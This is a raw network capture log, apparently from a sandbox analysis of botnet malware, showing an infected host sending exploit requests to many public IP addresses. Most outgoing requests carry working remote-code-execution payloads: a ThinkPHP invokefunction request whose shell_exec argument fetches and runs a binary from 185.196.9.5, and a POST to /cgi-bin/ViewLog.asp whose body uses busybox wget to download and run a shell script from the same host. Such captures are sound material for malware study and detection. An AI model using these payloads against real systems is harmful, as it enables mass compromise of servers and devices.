Feb 25, 2024 19:03:46.346394062 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:46.538733006 CET	453	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:46 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_jk/1.2.46 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
518	192.168.2.15	41368	95.213.179.172	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.359247923 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:46.563343048 CET	407	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:46 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
519	192.168.2.15	60354	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.480174065 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:45Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
520	192.168.2.15	43396	112.166.69.113	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.819864035 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
521	192.168.2.15	36076	112.126.101.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.836914062 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:47.143618107 CET	463	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:46 GMT Server: Apache Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
522	192.168.2.15	57358	62.210.26.201	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.981842041 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.155981064 CET	348	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:03:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$'gd*SJRl2MCAvAyyyr ;410

Session ID	Source IP	Source Port	Destination IP	Destination Port
523	192.168.2.15	46324	85.214.65.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.987427950 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.182209015 CET	423	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:47 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://www.syncoachbeheer.nl/cgi-bin/ViewLog.asp Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
524	192.168.2.15	54212	31.136.115.253	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.989686966 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.557950020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:48.709777117 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:51.013829947 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:55.621740103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:04.837774038 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.037399054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:00.901016951 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
525	192.168.2.15	44778	62.29.15.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.012890100 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
526	192.168.2.15	44090	95.110.133.72	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.012990952 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:47.204727888 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:47 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
527	192.168.2.15	55028	95.216.93.62	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.014718056 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:47.209381104 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:47 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
528	192.168.2.15	51020	95.216.10.14	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:47.016011953 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:47.212452888 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:47 GMT Server: Apache Accept-Ranges: bytes Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
Feb 25, 2024 19:03:47.212472916 CET	1286	IN	Data Raw: 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
Feb 25, 2024 19:03:47.212547064 CET	1286	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 Data Ascii: .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer {
